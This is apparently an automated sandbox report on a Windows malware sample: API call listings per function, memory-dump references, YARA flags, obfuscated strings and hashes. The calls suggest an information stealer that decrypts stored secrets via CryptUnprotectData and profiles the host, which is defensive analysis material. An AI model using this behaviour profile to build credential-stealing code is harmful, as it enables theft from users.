                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E4BFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: eb2e8cd2ff8f2bbc892dbd6f97fca621d868c90be838afc475b4f483fbff99a6
                            • Instruction ID: fd687fcacc0932367963afc98ce5385cc978d0ba7e7b71ab4ec759d436d27018
                            • Opcode Fuzzy Hash: eb2e8cd2ff8f2bbc892dbd6f97fca621d868c90be838afc475b4f483fbff99a6
                            • Instruction Fuzzy Hash: C6313071A252669BC772EF26EC95B9E77B7EF60300F041129F80597351CB30DC018B94
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =l5$O{]$Qtg?$crO$rQ}t$wG[?$wk5$q~7
                            • API String ID: 0-491307191
                            • Opcode ID: 3be8296af48543e0d930ed063e32f8d95e6f21418c0607e17ac8d6aee3672684
                            • Instruction ID: 3cdfc53741951fbcd643d69772c9071449420788a57b8237e5ef947144f28dc3
                            • Opcode Fuzzy Hash: 3be8296af48543e0d930ed063e32f8d95e6f21418c0607e17ac8d6aee3672684
                            • Instruction Fuzzy Hash: 45B2F7F360C2009FE704AE2DEC8567ABBE9EF94720F1A493DEAC5C7344E63558058697
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006F2D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006F2DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 006F2DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006F2DEC
                            • LocalFree.KERNEL32(00000000), ref: 006F2FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 7ea3531b71c47bff1652180222cb8977c9dba17446b138ab3e839f5a663a2de6
                            • Instruction ID: 4fa7547f6f370183031d2bffe08de0c42ca30c61ba6a20b4184792bc3808108b
                            • Opcode Fuzzy Hash: 7ea3531b71c47bff1652180222cb8977c9dba17446b138ab3e839f5a663a2de6
                            • Instruction Fuzzy Hash: E5B12871A14219CFC754CF18C998BA9B7F2FB44324F29C1A9D5089B3A2D7769D82CF80
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #%z$*p4$@e{$[t~$pUg$T}$~vu
                            • API String ID: 0-2409267797
                            • Opcode ID: 6aebf2ee175fe4b76a78f4f9b7b9c7051ea8fbdda60b606fe2ae173ecddc802f
                            • Instruction ID: 3cca8421c349f33be955ae0d92ae8829c05b246e7d5e129025be7bf68308091f
                            • Opcode Fuzzy Hash: 6aebf2ee175fe4b76a78f4f9b7b9c7051ea8fbdda60b606fe2ae173ecddc802f
                            • Instruction Fuzzy Hash: 92B214F360C3049FE304AE2DEC8567ABBE5EF94720F1A4A3DE6C483744EA3558458697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 'xo$+_o$@[!Z$Gv_q$SKw[$b-*p$g%z
                            • API String ID: 0-165404567
                            • Opcode ID: 918412825d33bf84a31c04418af9c2fc93b867b9489df0546a291c748d0780cd
                            • Instruction ID: 5f5c335017662cd71fb99d7b059beac27a856187bbc06e639378a359caf393eb
                            • Opcode Fuzzy Hash: 918412825d33bf84a31c04418af9c2fc93b867b9489df0546a291c748d0780cd
                            • Instruction Fuzzy Hash: B2B218F3A0C2009FE7086E2DEC8567AFBE9EF98320F1A453DE6C5C7744E63558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: .KvG$@jj$a9Oa$iNs{$w\[$A}O
                            • API String ID: 0-3852754235
                            • Opcode ID: a51157b9e453b0cc3e6d584804bf4b284588601f0dc97e0228a8b65ad7b8eaf9
                            • Instruction ID: 70a21fd2b33d6fe21d87ce9671b28f77647767cd1d6dc894a60a125418cc6379
                            • Opcode Fuzzy Hash: a51157b9e453b0cc3e6d584804bf4b284588601f0dc97e0228a8b65ad7b8eaf9
                            • Instruction Fuzzy Hash: C1B23BF3A0C2109FE3046E2DEC9567AFBE9EF94720F1A4A3DE9C5D7744E63558008692
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &kY]$5,_g$?t_~$Bc_$q[${]
                            • API String ID: 0-2751062057
                            • Opcode ID: f452a50c7d1b00283696c645a8629935335a3c9e15cfcb5b7d8f9192a85c3584
                            • Instruction ID: b277f76109a1e6834eb5cecd7687673b0112e20ac070ed81ab674f2167df455a
                            • Opcode Fuzzy Hash: f452a50c7d1b00283696c645a8629935335a3c9e15cfcb5b7d8f9192a85c3584
                            • Instruction Fuzzy Hash: E1B215F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A453DEAC5C7744EA3558058697
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 006F2C58
                            • wsprintfA.USER32 ref: 006F2C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: 12643c31c429d5d8a57c493510f5b2bd4c60cfe1617e358c0e36df880e646a37
                            • Instruction ID: 935f634934a49c22c4acfce611bc345e927b0f9ad3b05a5ede7cb32ec3d35226
                            • Opcode Fuzzy Hash: 12643c31c429d5d8a57c493510f5b2bd4c60cfe1617e358c0e36df880e646a37
                            • Instruction Fuzzy Hash: 4301F7B1A44604AFCB188B68DC09BAEB77DEB84721F004329F915D77C0D77419008AD1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: '_v%$)g0'$0H{$Icu\$a[
                            • API String ID: 0-1835181370
                            • Opcode ID: 9bf12d1fd5e4bf984a4fbd6ade41dc52001bc1db186e7533a5062472675e1cb7
                            • Instruction ID: c2017107fa501bade05bf5f49897b950a57e2b8f7abca699cbb8599edf7b19ef
                            • Opcode Fuzzy Hash: 9bf12d1fd5e4bf984a4fbd6ade41dc52001bc1db186e7533a5062472675e1cb7
                            • Instruction Fuzzy Hash: 59B2F4F360C204AFE704AE2DEC8567ABBE5EF94320F16493DEAC5C3744E63598058697
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 006D775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D7765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006D778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006D77AD
                            • LocalFree.KERNEL32(?), ref: 006D77B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: d6b7d4e1ec2ffa4803dbad775de16160989c6db0e6ff878a9a18a55f5f11f871
                            • Instruction ID: a8e4ce5c5377e5703d32cd406ba5b3aab1f0b59f7bb534fc87cb7b62354a2faf
                            • Opcode Fuzzy Hash: d6b7d4e1ec2ffa4803dbad775de16160989c6db0e6ff878a9a18a55f5f11f871
                            • Instruction Fuzzy Hash: CA011E75B54308BFEB10DBA49C4AFAA7B79EB44B11F104155FB09EB2C0D6B0A9009B90
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006F3A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F3AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F3ABF
                              • Part of subcall function 006F7310: lstrlen.KERNEL32(------,006D5BEB), ref: 006F731B
                              • Part of subcall function 006F7310: lstrcpy.KERNEL32(00000000), ref: 006F733F
                              • Part of subcall function 006F7310: lstrcat.KERNEL32(?,------), ref: 006F7349
                              • Part of subcall function 006F7280: lstrcpy.KERNEL32(00000000), ref: 006F72AE
                            • CloseHandle.KERNEL32(00000000), ref: 006F3BF7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: decfc188d8e58289a44a2307c9b8cd855e36745ce62cda8c1dbfa33108173594
                            • Instruction ID: 9e40e30e8a471895807bd5b100070872c6248ec0457857e3032caa5cfc52c6ce
                            • Opcode Fuzzy Hash: decfc188d8e58289a44a2307c9b8cd855e36745ce62cda8c1dbfa33108173594
                            • Instruction Fuzzy Hash: 1681F370909229CFC754CF18C998BA5B7B2FB54324F29C1A9D5089B3B2D7769D82CB80
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 006DEA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 006DEA7E
                            • lstrcat.KERNEL32(006FCFEC,006FCFEC), ref: 006DEB27
                            • lstrcat.KERNEL32(006FCFEC,006FCFEC), ref: 006DEB49
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: fc1718df66b34628f2e3467670e7fda039a9c462af7473abfd9b26b62c6e5937
                            • Instruction ID: 14c2220d788772265b1a92ff1b3a15f351c563e501ec91a4a50611ac0f4a0405
                            • Opcode Fuzzy Hash: fc1718df66b34628f2e3467670e7fda039a9c462af7473abfd9b26b62c6e5937
                            • Instruction Fuzzy Hash: 0D31E175B14119ABDB109B98EC45FEFB77ADF44715F0040AAFA09E7240DBB05A048BA1
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 006F40CD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 006F40DC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F40E3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 006F4113
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: 0ed6fa3938521aa51239f22e9c3f6f4730e65bd90890d79894763301e31acd2a
                            • Instruction ID: 55e8da1a0e2746796deec4bd14017fd8e6cbac445efdc2eb2e98d6e6b3ef3374
                            • Opcode Fuzzy Hash: 0ed6fa3938521aa51239f22e9c3f6f4730e65bd90890d79894763301e31acd2a
                            • Instruction Fuzzy Hash: EE015A70600209AFDB109FA5DC89BABBBAEEF85311F108069BE48C7340DE719940DBA4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,006FA3D0,000000FF), ref: 006F2B8F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 006F2B96
                            • GetLocalTime.KERNEL32(?,?,00000000,006FA3D0,000000FF), ref: 006F2BA2
                            • wsprintfA.USER32 ref: 006F2BCE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 56a53ef598552d39477f6cb3b8810c8eaf9e47253dcbc805b1211e1bfd328332
                            • Instruction ID: f30840b27132f4141943c4305b71f3a3f9a9503cce5e3da1d4efeb5e113d5fd7
                            • Opcode Fuzzy Hash: 56a53ef598552d39477f6cb3b8810c8eaf9e47253dcbc805b1211e1bfd328332
                            • Instruction Fuzzy Hash: DE0180B2918128ABCB109BC9DC45BBFB7BCFB4CB11F00010AF645A2280E7780400D7B1
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D9B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006D9B61
                            • LocalFree.KERNEL32 ref: 006D9B70
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Nfwt$Ua[p$6v~
                            • API String ID: 0-1217512229
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: _5^o$;K'$KD5
                            • API String ID: 0-3646852682
                            APIs
                            • CoCreateInstance.COMBASE(006FB110,00000000,00000001,006FB100,?), ref: 006ECB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006ECB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 006ECBC9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006D9BB3
                            • LocalFree.KERNEL32(?), ref: 006D9BD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: M9n$T<n
                            • API String ID: 0-3094142804
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: zU$}u{
                            • API String ID: 0-3602348141
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: go
                            • API String ID: 0-2832283748
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: dlof
                            • API String ID: 0-2457419273
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0f648dd8f8dd33740419a2514498fd9ae9182d512b6bcef2b983b2fdac89f87
                            • Instruction ID: 57f3319338eacb2f837c61b0df11e971960ead21e525412738c85fdc335ce37e
                            • Opcode Fuzzy Hash: b0f648dd8f8dd33740419a2514498fd9ae9182d512b6bcef2b983b2fdac89f87
                            • Instruction Fuzzy Hash: FA5127F3A083149BE3046E2DEC8577AF7E5EB98320F1A053DEA94D7784E9355C0182D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3371783e097aff10c0ff8af8ec0042e5eb53450c7d6b8713459ee23cb3bb1740
                            • Instruction ID: e0d1d36ee8362d05e217ec1213b33f20d6ca01687a652d423685f0b4e93a6fc2
                            • Opcode Fuzzy Hash: 3371783e097aff10c0ff8af8ec0042e5eb53450c7d6b8713459ee23cb3bb1740
                            • Instruction Fuzzy Hash: 9251A1F2A0C6009FE704AF2AE88177EF7E6EB94320F16892DD6C587744E63548458A97
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f25a9967e72621efd03a5a46aeaef6d1f633b1edfd41d875dfa4037da42d45e0
                            • Instruction ID: f8c3991ef59ead82d5885ce4cbaee5d4c3e0bcb8b6333488b141304434e6a0c5
                            • Opcode Fuzzy Hash: f25a9967e72621efd03a5a46aeaef6d1f633b1edfd41d875dfa4037da42d45e0
                            • Instruction Fuzzy Hash: 3F4123F3E186005BF34CDA39DD5536A72C6DBD4311F2B863CAB89977C8EC795801428A
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E8636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 006E86AA
                            • StrStrA.SHLWAPI(?,0101F2E0), ref: 006E86CF
                            • lstrcpyn.KERNEL32(009093D0,?,00000000), ref: 006E86EE
                            • lstrlen.KERNEL32(?), ref: 006E8701
                            • wsprintfA.USER32 ref: 006E8711
                            • lstrcpy.KERNEL32(?,?), ref: 006E8727
                            • StrStrA.SHLWAPI(?,0101F3D0), ref: 006E8754
                            • lstrcpy.KERNEL32(?,009093D0), ref: 006E87B4
                            • StrStrA.SHLWAPI(?,0101F160), ref: 006E87E1
                            • lstrcpyn.KERNEL32(009093D0,?,00000000), ref: 006E8800
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 6889fcddf4a8d2dd73eb2e54e8df9961e6866bb3dfaa6b046a279bce19c7777f
                            • Instruction ID: 11cc69703eb2cf09a04f7541866ad8c205a3a23ff1b94b598cb479569c15337b
                            • Opcode Fuzzy Hash: 6889fcddf4a8d2dd73eb2e54e8df9961e6866bb3dfaa6b046a279bce19c7777f
                            • Instruction Fuzzy Hash: 80F16D72A19215AFDB10DB74DD48ADB77BAEF88300F144559EA49E3351DF30AE01DBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1F9F
                            • lstrlen.KERNEL32(010188F8), ref: 006D1FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D1FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 006D1FE3
                            • lstrlen.KERNEL32(00701794), ref: 006D1FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D200E
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D2042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D204D
                            • lstrlen.KERNEL32(00701794), ref: 006D2058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2075
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D20AC
                            • lstrlen.KERNEL32(?), ref: 006D20E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2104
                            • lstrcat.KERNEL32(00000000,?), ref: 006D2112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D2139
                            • lstrlen.KERNEL32(00701794), ref: 006D214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D216B
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006D2177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D21A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D21D4
                            • lstrlen.KERNEL32(?), ref: 006D21EA
